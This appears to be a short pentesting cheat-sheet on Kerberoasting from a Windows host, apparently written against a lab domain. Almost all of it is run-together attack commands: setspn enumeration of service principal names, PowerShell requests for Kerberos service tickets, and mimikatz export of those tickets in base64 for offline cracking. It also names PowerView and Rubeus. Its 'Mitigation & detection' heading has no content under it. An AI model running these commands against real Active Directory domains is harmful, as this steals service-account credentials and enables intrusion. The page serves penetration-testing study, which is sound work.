kerberoasting-using-windows
Kerberos attack (Windows)
setspn.exe -Q */*Add-Type -AssemblyName System.IdentityModelNew-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }.\mimikatz.exe "base64 /out:true" "kerberos::list /export" exitcat <base64_ticket> | tr -d \\nAutomation method:
Powerview - Tool
Mimikatz - tool
Rubeus - Tool
Mitigation & detection
Last updated